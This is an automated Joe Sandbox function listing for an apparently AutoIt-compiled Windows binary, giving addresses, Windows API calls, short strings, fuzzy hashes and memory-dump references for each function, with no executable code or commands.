Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 606fd2284bff72c8ecec232c3da34d1ca60591424ec0f9de7e380959025395d7
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: BD0140B244424ABBCF2A6F84CC41CED3F62BB18360F588415FE1858131D336D9B1BB81

Function 00F8B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00F8B2E4
ScreenToClient.USER32(?,?), ref: 00F8B2FC
ScreenToClient.USER32(?,?), ref: 00F8B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F8B33B

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 76c11ff3474f6a394f81fb204425d8fad2e9c89bc98f2c71f814915b52319106
Instruction ID: d49022fe7e42f7649aaf7128519f6b60ee3b7a1a3bb5a709362a1c0a819d60f7
Opcode Fuzzy Hash: 76c11ff3474f6a394f81fb204425d8fad2e9c89bc98f2c71f814915b52319106
Instruction Fuzzy Hash: 3D114675D0020DEFDB41DF99C8449EEBBB5FF18310F104166E914E3220D735AA559F50

Function 00F8B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F8B644
_memset.LIBCMT ref: 00F8B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FC6F20,00FC6F64), ref: 00F8B682
CloseHandle.KERNEL32 ref: 00F8B694

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 1b3e06bc7cd28e742ca8ef7aeceb3b05540ec3ae6e3a70f741d4b754656b1555
Instruction ID: cb5375967e41b86a8489c1210109cdb98f7f8fe49031863033fa3c4e9261d8a0
Opcode Fuzzy Hash: 1b3e06bc7cd28e742ca8ef7aeceb3b05540ec3ae6e3a70f741d4b754656b1555
Instruction Fuzzy Hash: 7FF082B25443187FE3102761BD07FBB3A9CEB08395F404028FA08E6192E7768C00E7A8

Function 00F66BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00F66BE6

Part of subcall function 00F676C4: _memset.LIBCMT ref: 00F676F9

_memmove.LIBCMT ref: 00F66C09
_memset.LIBCMT ref: 00F66C16
LeaveCriticalSection.KERNEL32(?), ref: 00F66C26

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: ac56b282f5af55e04e31d61cf78227966b3620b9a062e470d6126db4b6507339
Instruction ID: 8ae98093606bb05a94d991a167731f3b25ca8914ad13cc1a0af0c75006f5efd5
Opcode Fuzzy Hash: ac56b282f5af55e04e31d61cf78227966b3620b9a062e470d6126db4b6507339
Instruction Fuzzy Hash: 80F0543A100114BBCF016F55EC85A8ABF29EF45360F048065FE085E227D735E811EBB4

Function 00F02218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00F02231
SetTextColor.GDI32(?,000000FF), ref: 00F0223B
SetBkMode.GDI32(?,00000001), ref: 00F02250
GetStockObject.GDI32(00000005), ref: 00F02258
GetWindowDC.USER32(?,00000000), ref: 00F3BE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00F3BE90
GetPixel.GDI32(00000000,?,00000000), ref: 00F3BEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00F3BEC2
GetPixel.GDI32(00000000,?,?), ref: 00F3BEE2
ReleaseDC.USER32(?,00000000), ref: 00F3BEED

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 8dbec2321652028657c2f60a62fd9cfebe5a26c7b7f2cc15fcc2f7a2d9339f68
Instruction ID: 44f6693fee7d9b4b0d4901bd4a6bb7e7e98ef84673152ad07f15162af94d3864
Opcode Fuzzy Hash: 8dbec2321652028657c2f60a62fd9cfebe5a26c7b7f2cc15fcc2f7a2d9339f68
Instruction Fuzzy Hash: A6E03932904648EEEB215FA8EC4D7E83B10EB05332F148366FA69880E187714994EB22

Function 00F58712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00F5871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00F582E6), ref: 00F58722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F582E6), ref: 00F5872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00F582E6), ref: 00F58736

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: c3a8f457482d2641e59b10e53e866a07b7f29128025548ccee98039fe5a15ea4
Instruction ID: 2d9a53e5ec07a9f0cea701ae976f20fe255064545c87792ba70943f03c1604a3
Opcode Fuzzy Hash: c3a8f457482d2641e59b10e53e866a07b7f29128025548ccee98039fe5a15ea4
Instruction Fuzzy Hash: A2E08636A113159FD7205FB06D0CBE63BACEF547E2F244828B645DA050DA34844AE750

Function 00F5B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00F5B4BE

Strings

AutoIt3GUI, xrefs: 00F5B436
Container, xrefs: 00F5B43B

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 802b54d53ef5e85a866212f8f6bed54e6675c9eeec9402be6d6e0f30ba7f6349
Instruction ID: 02cbcc83ba8fb2b7de7be079ec7c34efec26b5c896ddcd6fabad4b3af1573a4b
Opcode Fuzzy Hash: 802b54d53ef5e85a866212f8f6bed54e6675c9eeec9402be6d6e0f30ba7f6349
Instruction Fuzzy Hash: 61916A71600601AFDB24DF64C884B6ABBE5FF49711F24846DFE4ACB292EB70E845DB50

Function 00F6AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1FC86: _wcscpy.LIBCMT ref: 00F1FCA9

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

__wcsnicmp.LIBCMT ref: 00F6B02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F6B0F6

Strings

LPT, xrefs: 00F6B027

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 209e2d3135fc58972c7e54cfe138469f1029f48fc027c877da019f7dd68d2249
Instruction ID: f9b4c3937ccda200249237cc525b979fe1fde9e62eac2a6163cf8218a640543c
Opcode Fuzzy Hash: 209e2d3135fc58972c7e54cfe138469f1029f48fc027c877da019f7dd68d2249
Instruction Fuzzy Hash: 38618176E04215AFCB14DF94C891EAEB7B4EF09310F148069F916EB391E774AE84EB50

Function 00F12957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00F12968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00F12981

Strings

@, xrefs: 00F12975

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: f23aed8f2e45f022b35747d63aebb2a2198d54d34b4d173dbd2cde1dfd174039
Instruction ID: d14f045a97cfa4ef532243b2abf3779a4cc9a846c044c710d173db5f07ff5037
Opcode Fuzzy Hash: f23aed8f2e45f022b35747d63aebb2a2198d54d34b4d173dbd2cde1dfd174039
Instruction Fuzzy Hash: C3516B714087489BD320EF54DC85BAFB7E8FF85340F81885DF2D8411A1EBB49529EB56

Function 00F69734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00F04F0B: __fread_nolock.LIBCMT ref: 00F04F29

_wcscmp.LIBCMT ref: 00F69824
_wcscmp.LIBCMT ref: 00F69837

Strings

FILE, xrefs: 00F69770

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 5193acbe2b5d1b1f3dec2f8926180427c4d5aea570f0d3ac2e0178b5abcdc879
Instruction ID: 629226f69625ad56fa987d32964330b81f21a748c486b20deec66c0514f56f33
Opcode Fuzzy Hash: 5193acbe2b5d1b1f3dec2f8926180427c4d5aea570f0d3ac2e0178b5abcdc879
Instruction Fuzzy Hash: 6441B871A0421ABADF209AA5CC45FEFB7BDEF85710F000469FA04E7181DAB5A905AB61

Function 00F7258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F7259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F725D4

Strings

|, xrefs: 00F725A5

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: ccfb349ec716b9a58d45d1ee7cefdf192af0656af61ffe56a15eb23617194b94
Instruction ID: ee3006f74f016ca499cb99bad00261a3cd6ad8f15a6174fd8d03002c2b18d65c
Opcode Fuzzy Hash: ccfb349ec716b9a58d45d1ee7cefdf192af0656af61ffe56a15eb23617194b94
Instruction Fuzzy Hash: 50311771D00219ABCF51EFA1CC85EEEBFB8FF08350F10405AF918A6162EB355956EB60

Function 00F87A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00F87B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F87B76

Strings

', xrefs: 00F87ACA

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 14338e49bcf22a9baeb30cf0f6712e166e5b6c482d80cbf10e4af733e2385810
Instruction ID: 9bb05cd06ade4cc60dc83707bbf1ec6a9a22be6f9f664a48851105db55f13a0a
Opcode Fuzzy Hash: 14338e49bcf22a9baeb30cf0f6712e166e5b6c482d80cbf10e4af733e2385810
Instruction Fuzzy Hash: C5412875A0430A9FDB14EF64C981BEABBB5FF48300F20016AE904EB395D770A941EF90

Function 00F86A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00F86B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F86B53

Strings

static, xrefs: 00F86AB3

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 46470d81ce1ef125c8ee994f76e46b818ecb92d5c5905635ab62312ea2d59c38
Instruction ID: 55974f87372719a6f141367baac1760622d563bd6a14187ef24d82f603ca8a4c
Opcode Fuzzy Hash: 46470d81ce1ef125c8ee994f76e46b818ecb92d5c5905635ab62312ea2d59c38
Instruction Fuzzy Hash: F8318F71600608AEDB10AF64CC81FFB77A9FF88764F108619F9A5D7190DA35AC91E760

Function 00F628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F62911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F6294C

Strings

0, xrefs: 00F6290A

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 9d8059a791addded251d3d25f52dacfc6ff2e0679630d14b02fc790eefdebd88
Instruction ID: 65125f74a84918ce7320abdfde7460827ae094d28c7743f8b9f57eed5b1ab596
Opcode Fuzzy Hash: 9d8059a791addded251d3d25f52dacfc6ff2e0679630d14b02fc790eefdebd88
Instruction Fuzzy Hash: E431F532E007059FEB64CF58CD45BAEBBB4EF85360F180029E881A61A1DB749940FB11

Function 00F739E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00F73A66

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Strings

, $, xrefs: 00F73AA6
AUTOITCALLVARIABLE%d, xrefs: 00F73A58

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 8dabf2b908a2b9c69041d3b8ee1ffcf79467032c209ca9352707954015aab44d
Instruction ID: 2b96e140fb74b0ac5bbf59b6400f2a6dbe7da304f20959c611b0b0e9c87c2e1b
Opcode Fuzzy Hash: 8dabf2b908a2b9c69041d3b8ee1ffcf79467032c209ca9352707954015aab44d
Instruction Fuzzy Hash: B8218175A00219BEDF10EF64CC82EAE77B9AF44740F404495E549A7182DB38EA46FB62

Function 00F866D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F86761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F8676C

Strings

Combobox, xrefs: 00F8672E

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: eb950b7e4111baa9b45b7bd6cceedac72f96e8f81e41ddbcc6da37f013b38679
Instruction ID: 19b7374ff9bfa3647f5d275bf5f93e6698a72846a394c1c3aef45a2fb2fceb89
Opcode Fuzzy Hash: eb950b7e4111baa9b45b7bd6cceedac72f96e8f81e41ddbcc6da37f013b38679
Instruction Fuzzy Hash: 0E118275710208AFEF11AF54DC81EFF3B6AEB48368F104129F914DB290DA75DC51A7A0

Function 00F86C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00F01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F01D73
Part of subcall function 00F01D35: GetStockObject.GDI32(00000011), ref: 00F01D87
Part of subcall function 00F01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F01D91

GetWindowRect.USER32(00000000,?), ref: 00F86C71
GetSysColor.USER32(00000012), ref: 00F86C8B

Strings

static, xrefs: 00F86C4E

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
